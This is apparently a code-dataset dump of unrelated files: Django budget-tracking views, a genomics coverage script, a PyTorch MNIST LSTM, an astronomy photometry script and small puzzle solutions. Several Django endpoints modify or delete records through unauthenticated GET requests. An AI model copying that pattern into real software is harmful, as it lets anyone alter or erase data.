'indicator': target.indicator,
'q1' : target.jan+target.feb+target.mar,
'q2' : target.apr+target.may+target.jun,
'q3' : target.jul+target.aug+target.sept,
'q4' : target.oct+target.nov+target.dec,
})
data['wfp'] = wfp
data['perf_targets'] = q_targets
return render_to_response('./wfp/wfp_prog_detail.html', data, context)
'''
helper functions
'''
@transaction.atomic
def saveWFPData(request, wfp_form, year, agency_id):
wfp = WFPData(
year = year,
program = wfp_form.cleaned_data['program'],
activity = wfp_form.cleaned_data['activity'],
allocation = request.POST.get('allocation'),
agency = Agency.objects.get(id=agency_id),
jan = wfp_form.cleaned_data['jan'],
feb = wfp_form.cleaned_data['feb'],
mar = wfp_form.cleaned_data['mar'],
apr = wfp_form.cleaned_data['apr'],
may = wfp_form.cleaned_data['may'],
jun = wfp_form.cleaned_data['jun'],
jul = wfp_form.cleaned_data['jul'],
aug = wfp_form.cleaned_data['aug'],
sept = wfp_form.cleaned_data['sept'],
oct = wfp_form.cleaned_data['oct'],
nov = wfp_form.cleaned_data['nov'],
dec = wfp_form.cleaned_data['dec']
)
wfp.total = wfp.jan + wfp.feb + wfp.mar + wfp.apr + wfp.may + wfp.jun + wfp.jul + wfp.aug + wfp.sept + wfp.oct + wfp.nov + wfp.dec
wfp.save()
#save performance indicator
perf_indics = request.POST.getlist('pis[]')
for pi in perf_indics:
pi_info = pi.split(';')
perf_target = PerformanceTarget(wfp_activity=wfp,
indicator=pi_info[0],
jan=pi_info[1],
feb=pi_info[2],
mar=pi_info[3],
apr=pi_info[4],
may=pi_info[5],
jun=pi_info[6],
jul=pi_info[7],
aug=pi_info[8],
sept=pi_info[9],
oct=pi_info[10],
nov=pi_info[11],
dec=pi_info[12]
)
perf_target.save()
@transaction.atomic
def printWFPData(request):
context = RequestContext(request)
agency = Agency.objects.get(id=request.GET.get('agency_id'))
year = request.GET.get('year')
pss = getProgOverview('PS', agency, year)
mooes = getProgOverview('MOOE', agency, year)
cos = getProgOverview('CO', agency, year)
wfp_total = getWFPTotal(agency, year)
data = {'system_name' : SYSTEM_NAME,
'agency' : agency,
'year' : year,
'cur_date' : time.strftime('%B %d, %Y'),
'pss' : pss,
'mooes' : mooes,
'cos' : cos,
'wfp_total' : wfp_total}
return render_to_response('./wfp/wfp_print.html',data, context)
@login_required(login_url='/admin/')
def viewApprovedBudget(request):
context = RequestContext(request)
data = {'system_name' : SYSTEM_NAME}
cursor = connection.cursor()
data['allowed_tabs'] = get_allowed_tabs(request.user.id)
try:
agency = Agency.objects.get(id=request.GET.get('agency_id'))
data['agency'] = agency
return render_to_response('./wfp/approved_budget.html', data, context)
except Agency.DoesNotExist:
return render_to_response('./wfp/approved_budget.html', data, context)
@login_required(login_url='/admin/')
def coRequests(request):
cursor = connection.cursor()
context = RequestContext(request)
data = {'system_name' : SYSTEM_NAME,
'agency_id' : request.GET.get('agency_id')}
try:
data['allowed_tabs'] = get_allowed_tabs(request.user.id)
agency = Agency.objects.get(id=data['agency_id'])
data['agency'] = agency
year = 0
month = 0
co_requests = None
if request.method == 'POST':
year_month = request.POST.get('month').split('-')
year = int(year_month[0])
month = int(year_month[1])
else:
year = int(time.strftime('%Y'))
month = int(time.strftime('%m'))
#get current month and year
co_requests = CoRequest.objects.filter(date_received__year=year, date_received__month=month, agency=agency)
data['co_requests'] = co_requests
data['year'] = year
data['month'] = month
data['month_str'] = months[month-1]
return render_to_response('./wfp/co_request.html', data, context)
except Agency.DoesNotExist:
return HttpResponseRedirect("/admin/agencies")
@login_required(login_url='/admin/')
def coRequestForm(request):
    """Add/edit form handler for CO requests of one agency.

    GET renders an empty form; POST with form_action='add' validates and
    saves a new request. The 'edit' branch is a stub that just echoes
    'edit'; any other/invalid action echoes the action string back.
    """
    context = RequestContext(request)
    data = {'system_name' : SYSTEM_NAME,
            'agency_id' : request.GET.get('agency_id'),
            'action' : request.GET.get('action')
            }
    try:
        data['allowed_tabs'] = get_allowed_tabs(request.user.id)
        agency = Agency.objects.get(id=data['agency_id'])
        data['agency'] = agency
        if request.method == 'POST':
            co_request_form = CORequestForm(request.POST)
            action = request.POST.get('form_action', 'add')
            if action == 'add' and co_request_form.is_valid():
                # the POSTed agency_id wins over the one from the query string
                agency = Agency.objects.get(id=request.POST.get('agency_id'))
                date_rcv = request.POST.get('date_received')
                addCORequest(co_request_form, agency, date_rcv, request)
                data['s_msg'] = 'New request succesfully Saved'
                data['form'] = CORequestForm()  # fresh form after saving
                return render_to_response('./wfp/co_request_form.html', data, context)
            elif action == 'edit' and co_request_form.is_valid():  # edit: not implemented yet
                return HttpResponse('edit')
            else:
                # invalid form or unknown action: echo the action back
                return HttpResponse(action)
        # elif request.GET.get()
        else:
            data['form_action'] = request.GET.get('form_action', 'add')
            data['form'] = CORequestForm()
            return render_to_response('./wfp/co_request_form.html', data, context)
    except Agency.DoesNotExist:
        return HttpResponseRedirect("/admin/agencies")
def addCORequest(request_form, agency, date_rcv, request):
    """Persist a new CoRequest built from a validated CORequestForm."""
    cleaned = request_form.cleaned_data
    CoRequest(
        date_received=date_rcv,
        agency=agency,
        subject=cleaned['subject'],
        action=cleaned['action'],
        status=cleaned['status'],
        user=request.user,
    ).save()
@transaction.atomic
def updateMonthlyAmount(request):
    """Set one month's amount on a WFPData row and recompute its total.

    GET params: month (1-12; anything out of range falls back to December,
    matching the original if/elif chain's final else), id_wfp (WFPData pk),
    amount (numeric string). Responds 'Updated' on success, 'Error' when
    the row does not exist.
    """
    from decimal import Decimal

    # model field name for each month, indexed by month-1
    MONTH_FIELDS = ('jan', 'feb', 'mar', 'apr', 'may', 'jun',
                    'jul', 'aug', 'sept', 'oct', 'nov', 'dec')
    month = int(request.GET.get('month'))
    wfp_id = int(request.GET.get('id_wfp'))
    # SECURITY FIX: the original ran eval() on this request parameter,
    # which allows arbitrary remote code execution; parse it as a Decimal
    # (also mixes safely with the model's Decimal month fields).
    amount = Decimal(request.GET.get('amount'))
    try:
        wfp = WFPData.objects.get(id=wfp_id)
        field = MONTH_FIELDS[month - 1] if 1 <= month <= 12 else 'dec'
        setattr(wfp, field, amount)
        # keep the denormalised yearly total in sync with the 12 months
        wfp.total = sum(getattr(wfp, name) for name in MONTH_FIELDS)
        wfp.save()
        return HttpResponse('Updated')
    except WFPData.DoesNotExist:
        return HttpResponse('Error')
def updateActivity(request):
    """Update the activity/program/allocation text fields of a WFPData row.

    GET params: wfp_id, activity, program, allocation.
    Echoes the new activity text back, or 'Error' when the row is missing.
    """
    try:
        wfp_id = request.GET.get('wfp_id')
        activity = request.GET.get('activity')
        program = request.GET.get('program')
        allocation = request.GET.get('allocation')
        wfp = WFPData.objects.get(id=wfp_id)
        wfp.activity = activity
        wfp.program = program
        wfp.allocation = allocation
        wfp.save()
        return HttpResponse(activity);
    except WFPData.DoesNotExist:
        return HttpResponse('Error')
@login_required(login_url='/home')
@transaction.atomic
def delActivity(request):
    """Delete a WFP activity plus its dependent target/report rows.

    GET param: activity_id (WFPData pk). Responds 'ok', or redirects home
    when the activity does not exist.

    Fixes: dropped the pointless variable bindings around the dependent
    .delete() calls (the values were never used).
    """
    activity_id = request.GET.get('activity_id')
    try:
        wfp_activity = WFPData.objects.get(id=activity_id)
        # remove dependent rows first, then the activity itself
        PerformanceTarget.objects.filter(wfp_activity=wfp_activity).delete()
        PerformanceReport.objects.filter(activity=wfp_activity).delete()
        wfp_activity.delete()
        return HttpResponse('ok')
    except WFPData.DoesNotExist:
        return HttpResponseRedirect('/home')
def delPerfTarget(request):
    """Delete one PerformanceTarget by ?id=; respond 'Deleted' or 'Error'.

    Fixes: narrowed the bare `except:` (which also swallowed SystemExit and
    KeyboardInterrupt) to `except Exception`, and dropped an unused binding.
    """
    try:
        PerformanceTarget.objects.get(id=request.GET.get('id')).delete()
        return HttpResponse('Deleted')
    except Exception:
        # best-effort endpoint: any failure is reported as 'Error'
        return HttpResponse('Error')
def addPerfTarget(request):
    """Create a PerformanceTarget for one WFP activity from GET params.

    Expects id_wfp plus the indicator text ('pi') and one value per month
    (missing months default to 0). Responds 'Added' or 'Error'.
    """
    try:
        wfp_id = request.GET.get('id_wfp')
        wfp = WFPData.objects.get(id=wfp_id)
        perf_target = PerformanceTarget(wfp_activity = wfp,
                                        indicator = request.GET.get('pi'),
                                        jan = request.GET.get('jan', 0),
                                        feb = request.GET.get('feb', 0),
                                        mar = request.GET.get('mar', 0),
                                        apr = request.GET.get('apr', 0),
                                        may = request.GET.get('may', 0),
                                        jun = request.GET.get('jun', 0),
                                        jul = request.GET.get('jul', 0),
                                        aug = request.GET.get('aug', 0),
                                        sept = request.GET.get('sept', 0),
                                        oct = request.GET.get('oct', 0),
                                        nov = request.GET.get('nov', 0),
                                        dec = request.GET.get('dec', 0)
                                        )
        perf_target.save()
        return HttpResponse('Added')
    except WFPData.DoesNotExist:
        return HttpResponse('Error')
def getPerformanceAcc(request):
    """Render the per-month performance targets for one WFP activity.

    GET params: activity (WFPData pk) and optional month (1-12, defaults to
    the current month). Out-of-range months fall back to December, matching
    the original chain's final else.

    Fixes: the original's final else branch returned `target.nov` for
    December (and any month > 11) — it now correctly reads `target.dec`.
    The 12-branch if/elif chain is replaced by a field-name lookup.
    """
    context = RequestContext(request)
    data = {}
    # model field name for each month, indexed by month-1
    MONTH_FIELDS = ('jan', 'feb', 'mar', 'apr', 'may', 'jun',
                    'jul', 'aug', 'sept', 'oct', 'nov', 'dec')
    activity = WFPData.objects.get(id=request.GET.get('activity'))
    month = request.GET.get('month', datetime.today().month)
    try:
        month = int(month)
        field = MONTH_FIELDS[month - 1] if 1 <= month <= 12 else 'dec'
        perf_targets = [{'id' : target.id,
                         'indicator': target.indicator,
                         'target' : getattr(target, field)}
                        for target in PerformanceTarget.objects.filter(wfp_activity=activity)]
        data['perf_targets'] = perf_targets
        return render_to_response('./admin/performance_acc.html', data, context)
    except PerformanceTarget.DoesNotExist:
        return render_to_response('./admin/performance_acc.html', data, context)
'''
helper methods
'''
def getProgOverview(allocation, agency, year):
    """Build the per-programme activity overview for one allocation class.

    Returns a list of {'prog': name, 'acts': [...]} dicts; each activity
    entry carries its performance targets collapsed into calendar quarters.
    """
    cursor = connection.cursor()
    # distinct programme names for this allocation/agency/year (parameterised)
    query = '''
    select distinct(program) from wfp_data
    where allocation=%s and agency_id=%s and year=%s
    '''
    cursor.execute(query, [allocation, agency.id, year])
    prog_acts = []
    maj_prog = cursor.fetchall()
    for prog in maj_prog:
        acts = []
        activities = WFPData.objects.filter(agency=agency, allocation=allocation , year=year, program=prog[0])
        for act in activities:
            physical_targets = PerformanceTarget.objects.filter(wfp_activity = act)
            targets = []
            for target in physical_targets:
                # collapse the monthly targets into quarters
                targets.append({'indicator': target.indicator,
                                'q1' : target.jan+target.feb+target.mar,
                                'q2' : target.apr+target.may+target.jun,
                                'q3' : target.jul+target.aug+target.sept,
                                'q4' : target.oct+target.nov+target.dec})
            acts.append({'activity' : act,
                         'physical_targets' : targets
                         })
        prog_acts.append({'prog' : prog[0], 'acts' : acts})
    return prog_acts
@transaction.atomic
def getWFPTotal(agency, year):
    """Return month-by-month sums (plus grand total) of all WFP rows for one
    agency and year, as a single dict keyed jan_total..dec_total, total."""
    cursor = connection.cursor()
    # `dec` is backtick-quoted because DEC is a reserved word in MySQL
    query = '''
    select sum(jan) as jan_total, sum(feb) as feb_total, sum(mar) as mar_total,
    sum(apr) as apr_total, sum(may) as may_total, sum(jun) as jun_total,
    sum(jul) as jul_total, sum(aug) as aug_total, sum(sept) as sept_total,
    sum(oct) as oct_total, sum(nov) as nov_total, sum(`dec`) as dec_total,
    sum(total) as total
    from wfp_data
    where agency_id=%s and year=%s
    '''
    cursor.execute(query, [agency.id, year])
    return dictfetchall(cursor)[0]
|
994,922 | 22639e8d67ea484ba4363c34ed86bbf8996dfbeb | #! /usr/local/packages/Python-2.6.4/bin/python
from sys import *
from collections import defaultdict
import optparse
import re
###############################################################################
# command line parameters
usage = """find_intergenic_background_cutoff.py [options] zcontig_length_file gff3_file wig_file*
This script produces a depth-of-coverage cut-off intended for transcript
finding, defined as a particular quantile of the distribution of
depths-of-coverage over what we hope are dependably intergenic regions.
These are positions meeting the following criteria:
No feature covers the position
The nearest flanking features both point away from the position
The distance to those flanking features is neither too short nor too long
The contig length file should be tab-delimited, with no header and two columns: contig ID and length
"""
# NOTE(review): the usage text describes positional arguments, but the inputs
# are actually taken from the -g/-c/-w options below — confirm and update.
parser = optparse.OptionParser(usage=usage)
parser.add_option('-q', '--quantile', type='float', default=0.7,
                  help='quantile (0-1) of coverage to output (default 0.7)')
parser.add_option('-n', '--min_interbutt', type='int', default=50,
                  help='minimum distance from nearest flanking feature (default 50)')
parser.add_option('-x', '--max_interbutt', type='int', default=1000,
                  help='maximum distance from nearest flanking feature (default 1000)')
parser.add_option('-g', '--gff3_file', help='Path to a GFF3 file')
parser.add_option('-c', '--contig_length_file', help='Path to a contig lengths file')
parser.add_option('-w', '--wig_file', help='Path to a WIG file')
parser.add_option('-W', '--second_wig', help='Path to a second WIG file that is a pair to the file specified in --wig_file')
(options, args) = parser.parse_args()

# unpack the options into the module-level names used below
quantile = options.quantile
min_interbutt = options.min_interbutt
max_interbutt = options.max_interbutt
contig_length_file = open(options.contig_length_file)
gff3_file = open(options.gff3_file)
wig_files = []
wig1 = open(options.wig_file)
wig_files.append(wig1)
if options.second_wig:
    # optionally process a second (paired) WIG file
    wig2 = open(options.second_wig)
    wig_files.append(wig2)
###############################################################################
# read contig length file
# map contig ID -> length (bp) from the tab-delimited, headerless length file
contig_length = {}
for line in contig_length_file:
    contig, length = line[:-1].split('\t')
    contig_length[contig] = int(length)
contig_length_file.close()
###############################################################################
# read gff3 file
# Build, per contig and per strand, one boolean flag per base position
# marking whether any GFF3 feature covers it.
contig_direction_position_genic = {}
for line in gff3_file:
    if line.startswith('#'):
        continue
    contig, unk1, span_type, start, end, unk2, direction, unk3, att_val_pairs = line[:-1].split('\t')
    start, end = map(int, (start, end))
    direction = intern(direction)  # Python 2 builtin; interned strand string
    try:
        direction_position_genic = contig_direction_position_genic[contig]
    except:
        # first feature on this contig: allocate one flag per base, per strand
        direction_position_genic = contig_direction_position_genic[contig] = {
            '+' : [False] * contig_length[contig],
            '-' : [False] * contig_length[contig]
            }
    position_genic = direction_position_genic[direction]
    # GFF3 coordinates are 1-based inclusive, hence the start - 1
    for position in range(start - 1, end):
        position_genic[position] = True
gff3_file.close()
###############################################################################
# calculate interbutts: for each position on each contig, is the position
# outside of any annotated gene, are the nearest flanking genes both oriented
# away from the current position, and if so, what is the distance to the
# nearest of the two flanking genes
def calculate_distance_from_most_recent_gene(position_genic):
    """Given per-position genic flags, return for each position the number of
    bases since the most recent genic position (0 on genic positions)."""
    distances = []
    run_length = 0
    for is_genic in position_genic:
        run_length = 0 if is_genic else run_length + 1
        distances.append(run_length)
    return distances
# For every position on every contig decide whether it is "interbutt":
# outside any gene, with the nearest '-' feature on its left and the nearest
# '+' feature on its right (both pointing away); if so record the distance to
# the closer of the two flanking features, otherwise False.
contig_position_interbutt = {}
for contig, direction_position_genic in contig_direction_position_genic.iteritems():
    distance_from_plus_left = calculate_distance_from_most_recent_gene(direction_position_genic['+'])
    distance_from_minus_left = calculate_distance_from_most_recent_gene(direction_position_genic['-'])
    distance_from_plus_right = list(reversed(calculate_distance_from_most_recent_gene(reversed(direction_position_genic['+']))))
    distance_from_minus_right = list(reversed(calculate_distance_from_most_recent_gene(reversed(direction_position_genic['-']))))
    position_interbutt = contig_position_interbutt[contig] = []
    for position in range(contig_length[contig]):
        position_interbutt.append(
            distance_from_minus_left[position] < distance_from_plus_left[position]
            and distance_from_plus_right[position] < distance_from_minus_right[position]
            # BUG FIX: the original passed the whole distance_from_plus_right
            # list to min(); under Python 2's mixed-type ordering (int < list)
            # that silently always returned the left-hand distance. Index the
            # list at the current position instead.
            and min(distance_from_minus_left[position], distance_from_plus_right[position])
        )
###############################################################################
# read WIG files
#One of two possible header types
# One of two possible WIG track header types
variableStep_header_line_pat = re.compile('^variableStep chrom=(.*)$')
fixedStep_header_line_pat = re.compile(r'^fixedStep chrom=(\S+) start=(\d+) step=(\d+)')

def read_wig(file):
    """Parse a WIG file (fixedStep and/or variableStep tracks) into a nested
    mapping: contig -> position -> count; unseen positions default to 0."""
    contig_position_count = defaultdict(lambda: defaultdict(lambda: 0))
    contig = None
    in_fixed = in_variable = False
    for line in file:
        fixed_match = fixedStep_header_line_pat.match(line)
        variable_match = None if fixed_match else variableStep_header_line_pat.match(line)
        if fixed_match:
            # start of a fixedStep track: positions advance by a constant step
            contig, start, step = fixed_match.groups()
            position = int(start)
            step = int(step)
            in_fixed, in_variable = True, False
        elif variable_match:
            # start of a variableStep track: each data line carries its position
            contig, = variable_match.groups()
            in_fixed, in_variable = False, True
        elif in_fixed:
            assert contig is not None
            contig_position_count[contig][position] = int(line.strip())
            position += step
        else:
            assert in_variable
            assert contig is not None
            position, count = map(float, line[:-1].split('\t'))
            contig_position_count[contig][position] = count
    return contig_position_count
# parse each WIG file into its own contig -> position -> count mapping
contig_position_counts = []
for wig_file in wig_files:
    contig_position_counts.append(read_wig(wig_file))
    wig_file.close()
###############################################################################
# for each WIG file, collect read counts for each position meeting the
# interbutt criteria
# For each WIG file, gather the coverage counts at every position that met
# the interbutt criteria and falls inside the allowed distance window.
target_zone_countss = []
for contig_position_count in contig_position_counts:
    target_zone_counts = []
    for contig, position_interbutt in contig_position_interbutt.iteritems():
        position_count = contig_position_count[contig]
        for position, interbutt in enumerate(position_interbutt):
            count = position_count[position]
            # interbutt is either False or the distance to the nearest
            # flanking feature; keep only distances strictly inside the window
            if interbutt is not False and min_interbutt < interbutt < max_interbutt:
                target_zone_counts.append(count)
    target_zone_countss.append(target_zone_counts)
###############################################################################
# calculate a cutoff as the requested quantile for each set of counts, and
# average the individual cutoffs as the final output cutoff
def get_quantile(data, fraction=0.5):
    """Return the *fraction* quantile of *data* (0 <= fraction <= 1) using
    linear interpolation between the two bracketing order statistics.

    Fixes: the original returned the fixed midpoint of the two neighbouring
    values whenever the quantile position was fractional, which misplaces
    every quantile other than ones landing exactly on (or midway between)
    data points; proper linear interpolation is used instead.
    """
    data = sorted(data)
    position = fraction * (len(data) - 1)
    lower = int(position)
    remainder = position - lower
    if remainder == 0.0:
        return data[lower]
    # interpolate between the bracketing sorted values
    return data[lower] + remainder * (data[lower + 1] - data[lower])
# one cutoff per WIG file; report their mean as the final background cutoff
cutoffs = [get_quantile(counts, quantile) for counts in target_zone_countss]
print sum(cutoffs) / float(len(cutoffs))
|
994,923 | 3f8ea9583311f3c4a1d672117d892bd422a276f8 | class Solution(object):
def maxArea(self, height):
# 초기 최대값을 리스트 양끝의 2개의 숫자의 크기로 지정
pointer1 = 0
pointer2 = len(height) - 1
max_Area = (len(height) - 1) * min(height[pointer1], height[pointer2])
# 높이로 지정된 값들을 차례로 하나씩 욺겨가며 넓이를 비교
for i in range(len(height) - 1):
width = len(height) - (i + 2) # 가로의 길이를 먼저 계산
# 왼쪽이 오른쪽 보다 작을 경우
if height[pointer1] < height[pointer2]:
# 왼쪽의 포인터를 한칸 오른쪽으로 이동한 후 넓이를 계산하여 원래값과 비교해 큰 값을 저장
pointer1 += 1
temp_Area = width * min(height[pointer1], height[pointer2])
if temp_Area > max_Area:
max_Area = temp_Area
# 오른쪽이 왼쪽보다 작을 경우
elif height[pointer1] >= height[pointer2]:
# 오른쪽의 포인터를 한칸 왼쪽으로 이동한 후 넓이를 계산하여 원래값과 비교해 큰 값을 저장
pointer2 -= 1
temp_Area = width * min(height[pointer1], height[pointer2])
if temp_Area > max_Area:
max_Area = temp_Area
return(max_Area)
|
994,924 | d9fbd3579039ed176ad2263eeaa747598ebdff4d |
def mod(a, b):
    """Return a modulo b (for a >= 0, b > 0) by repeated subtraction.

    Fixes an off-by-one: the original loop condition `a - b > 0` stopped one
    subtraction early whenever b divides a, so mod(4, 2) returned 2 instead
    of 0.
    """
    while a - b >= 0:
        a -= b
    return a
|
994,925 | 074e029b6d0293022f6a45ad860e4c4860c6fdf3 | """p2 S3 Storage App Config"""
from django.apps import AppConfig
class P2S3StorageConfig(AppConfig):
    """p2 S3Storage App Config"""
    # dotted module path, unique app label, and human-readable name
    # registered with Django's application registry
    name = 'p2.storage.s3'
    label = 'p2_storage_s3'
    verbose_name = 'p2 S3 Storage'
|
994,926 | e74b85a643de17712cf4863a50672666af18e43e | import os
# third-party library
import torch
import torch.nn as nn
import torch.utils.data as Data
import torchvision
import matplotlib.pyplot as plt
from torch.autograd import Variable
# Hyper Parameters
EPOCH = 1            # train the training data n times; just 1 epoch to save time
BATCH_SIZE = 64
TIME_STEP = 28       # rnn time step / image height
INPUT_SIZE = 28      # rnn input size / image width
LR = 0.01            # learning rate
DOWNLOAD_MNIST = False

# Mnist digits dataset
if not(os.path.exists('./mnist/')) or not os.listdir('./mnist/'):
    # BUG FIX: the original assigned DOWNLOAD_MNIST = False here, a no-op
    # (it is already False) that left the dataset missing and made the
    # MNIST load below fail; request a download when ./mnist/ is absent
    # or empty.
    DOWNLOAD_MNIST = True

train_data = torchvision.datasets.MNIST(
    root='./mnist/',
    train=True,                                      # this is training data
    transform=torchvision.transforms.ToTensor(),     # Converts a PIL.Image or numpy.ndarray to
                                                     # torch.FloatTensor of shape (C x H x W) and normalize in the range [0.0, 1.0]
    download=DOWNLOAD_MNIST,
)
# plot one example
print(train_data.train_data.size())     # (60000, 28, 28)
print(train_data.train_labels.size())   # (60000)
# plt.imshow(train_data.train_data[0].numpy(), cmap='gray')
# plt.title('%i' % train_data.train_labels[0])
# plt.show()

test_data = torchvision.datasets.MNIST(root='./mnist/', train=False)

# Data Loader for easy mini-batch return in training
train_loader = torch.utils.data.DataLoader(dataset=train_data, batch_size=BATCH_SIZE, shuffle=True)

# convert test data into Variable, pick 2000 samples to speed up testing
# NOTE(review): .test_data/.test_labels are legacy torchvision attributes —
# confirm the installed torchvision version still exposes them.
test_x = test_data.test_data.type(torch.FloatTensor)[:2000]/255.   # shape (2000, 28, 28), values scaled into [0, 1]
test_y = test_data.test_labels.numpy()[:2000]    # convert to numpy array
class RNN(nn.Module):
    """Single-layer LSTM classifier: a 28-step sequence of 28-dim rows
    (one MNIST image read row by row) mapped to 10 digit logits."""

    def __init__(self):
        super(RNN, self).__init__()
        # batch_first=True so inputs are (batch, time_step, input_size)
        self.rnn = nn.LSTM(input_size=INPUT_SIZE, hidden_size=64,
                           num_layers=1, batch_first=True)
        self.output = nn.Linear(64, 10)

    def forward(self, x):
        # discard the (hidden, cell) state; classify from the last time step
        r_out, _ = self.rnn(x, None)
        return self.output(r_out[:, -1, :])
rnn = RNN()
print(rnn)

optimizer = torch.optim.Adam(rnn.parameters(), lr=LR)   # optimize all cnn parameters
loss_func = nn.CrossEntropyLoss()                       # the target label is not one-hotted

# training and testing
for epoch in range(EPOCH):
    for step, (b_x, b_y) in enumerate(train_loader):    # gives batch data
        b_x = b_x.view(-1, 28, 28)      # reshape x to (batch, time_step, input_size)
        b_x = Variable(b_x)
        b_y = Variable(b_y)
        output = rnn(b_x)                               # rnn output
        loss = loss_func(output, b_y)                   # cross entropy loss
        optimizer.zero_grad()                           # clear gradients for this training step
        loss.backward()                                 # backpropagation, compute gradients
        optimizer.step()                                # apply gradients

        # periodically evaluate on the 2000 held-out test images
        if step % 50 == 0:
            test_output = rnn(test_x)                   # (samples, time_step, input_size)
            pred_y = torch.max(test_output, 1)[1].data.numpy()
            accuracy = float((pred_y == test_y).astype(int).sum()) / float(test_y.size)
            print('Epoch: ', epoch, '| train loss: %.4f' % loss.data.numpy(), '| test accuracy: %.2f' % accuracy)

# print 10 predictions from test data
test_output = rnn(test_x[:10].view(-1, 28, 28))
pred_y = torch.max(test_output, 1)[1].data.numpy()
print(pred_y, 'prediction number')
print(test_y[:10], 'real number')
994,927 | d6ca457cf11db98d4cd0699fec161c063c684a22 | # Generated by Django 2.1 on 2018-09-03 04:49
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: add the optional CategoryList.banner_image field."""

    dependencies = [
        ('onorapp', '0024_news'),
    ]

    operations = [
        migrations.AddField(
            model_name='categorylist',
            name='banner_image',
            field=models.ImageField(blank=True, null=True, upload_to='categorylist_bannerimage'),
        ),
    ]
|
994,928 | e68b2988a5a1a09b0446850bf83c9baa2cba2df2 | #!/usr/bin/env python
from astropy.io import ascii,fits
from astropy.wcs import WCS
from astropy.table import join,vstack,Table
from CSPlib.phot import ApPhot,compute_zpt
from CSPlib import database
from CSPlib.tel_specs import getTelIns
from CSPlib import config
from CSPlib.config import getconfig
from matplotlib import pyplot as plt
from astropy.visualization import simple_norm
import argparse
import sys,os
import numpy as np
import warnings
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Do aperture photometry")
    parser.add_argument("image", help="list of science images", nargs="+")
    parser.add_argument("-cat", help="Catalog file")
    parser.add_argument("-objcol", help="Object column name in catalog file",
                        default="col2")
    parser.add_argument("-RAcol", help="RA column name in catalog file",
                        default="col3")
    parser.add_argument("-DECcol", help="DEC column name in catalog file",
                        default="col4")
    parser.add_argument("-tel", help="Telescope code", default='SWO')
    parser.add_argument("-ins", help="Insrument code", default='NC')
    parser.add_argument("-snap", help="Aperture number for SN", type=int,
                        default=-1)
    parser.add_argument("-o", help="Output SN photometryfile",
                        default="SNphot.dat")
    parser.add_argument("-db", help="Database to query LS coordinates (if no cat)",
                        default='POISE')
    args = parser.parse_args()

    specs = getTelIns(args.tel, args.ins)
    cfg = config.getconfig()
    Naps = len(cfg.photometry.aps)
    SNrows = []
    for imgfile in args.image:
        aphot = ApPhot(imgfile)
        print('Working on {}'.format(imgfile))
        # with no explicit catalog, pull local-sequence coordinates from the DB
        if args.cat is None:
            cat = database.getLSCoords(aphot.object, db=args.db)
            aphot.loadObjCatalog(table=cat, racol='RA', deccol='DEC', objcol='objID')
        else:
            aphot.loadObjCatalog(filename=args.cat, racol=args.RAcol,
                                 deccol=args.DECcol, objcol=args.objcol)
        aphot.makeApertures(appsizes=cfg.photometry.aps,
                            sky_in=cfg.photometry.skyin, sky_out=cfg.photometry.skyout)
        #with warnings.catch_warnings():
        #    warnings.simplefilter("ignore")
        #    aphot.plotCutOuts(xcols=6, ycols=6)
        # NOTE(review): bare except — any failure (not just photometry errors)
        # skips the image silently.
        try:
            phot = aphot.doPhotometry()
        except:
            print('Photometry failed for {}, skipping...'.format(imgfile))
            continue
        # mask out rows with NaN in any aperture magnitude or its error
        gids = True
        for i in range(0,Naps):
            gids = gids*~np.isnan(phot['ap{}'.format(i)])
            gids = gids*~np.isnan(phot['ap{}er'.format(i)])
        # NOTE(review): np.sometrue is deprecated (removed in NumPy 2.0);
        # confirm the pinned NumPy still provides it, else use np.any.
        if not np.sometrue(gids):
            print('All the apertures for {} had problems, skipping...'.format(
                imgfile))
            continue
        phot = phot[gids]
        phot.rename_column('OBJ','objID')
        phot.remove_column('id')
        phot.sort('objID')
        phot['xcenter'].info.format = "%.2f"
        phot['ycenter'].info.format = "%.2f"
        # Re-order columns
        cols = ['objID','xcenter','ycenter','msky','mskyer']
        for i in range(Naps):
            cols.append('flux{}'.format(i))
            cols.append('eflux{}'.format(i))
            cols.append('ap{}'.format(i))
            cols.append('ap{}er'.format(i))
        cols += ['flags','fits']
        phot = phot[cols]
        phot = phot.filled(fill_value=-1)
        # one .phot file per input image, fixed-width ASCII
        phot.write(imgfile.replace('.fits','.phot'),
                   format='ascii.fixed_width', delimiter=None, overwrite=True)
    # Name of the final aperture (assumed to be the standard)
    apn = "ap{}".format(len(cfg.photometry.aps)-1)
    apner = "ap{}er".format(len(cfg.photometry.aps)-1)
|
def answer(n):
    """Return the lexicographically largest string obtainable by taking the
    characters of n in order and, at each step, either prepending or
    appending the character to the word built so far."""
    word = n[0]
    for ch in n[1:]:
        if ch >= word[0]:
            word = ch + word   # at least as large as the front: prepend
        else:
            word = word + ch   # smaller than the front: append
    return word
# Code Jam driver: read cases from A-large.in, write answers to A-large.out
with open("A-large.in") as f:
    with open("A-large.out", "w") as w:
        f.readline()  # skip the test-case count header line
        question = 1
        for line in f:
            n = line.strip()
            output = answer(n)
            w.write("Case #{0}: {1}\n".format(question, output))
            question += 1
|
994,930 | cf7241326ab513efd09295a4a7c1ba4609a1a425 | from functools import reduce
import math
def mygcd(*diffs):
    """Fold math.gcd across all arguments: the gcd of the whole collection."""
    return reduce(lambda acc, value: math.gcd(acc, value), diffs)
ans = 0
k = int(input())
# brute-force: sum gcd(a, b, c) over every triple in [1, k]^3 — O(k^3) calls
for a in range (1, k + 1):
    for b in range (1, k + 1):
        for c in range (1, k + 1):
            l = [a, b, c]
            ans += mygcd(*l)
print (ans)
|
994,931 | 5b8d8576391d0ce5e27c55652c43d1fa4f6ea69e | a,b = map(int, input().split())
lcm = a*b   # gcd(a, b) * lcm(a, b) == a * b, so divide the product later
gcd = 0
# Euclidean algorithm by repeated remainder until it reaches 0
while True:
    gcd = max(a,b)%min(a,b)
    a, b = min(a,b), gcd
    if b == 0:
        gcd = a
        break
lcm //= gcd
print(gcd)
print(lcm)
|
994,932 | fdb1716c82c4456271e58744845bddc2c3fd603e | # Generated by Django 3.1.2 on 2020-11-30 13:05
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated: make Product.uom a nullable FK to setting.uom."""

    dependencies = [
        ('setting', '0002_auto_20201130_1940'),
        ('product', '0002_auto_20201130_1646'),
    ]

    operations = [
        migrations.AlterField(
            model_name='product',
            name='uom',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='setting.uom'),
        ),
    ]
|
994,933 | 79a6d475d17d3e6de5f5e82d28f785c90993b884 | '''
EJERCICIO 3
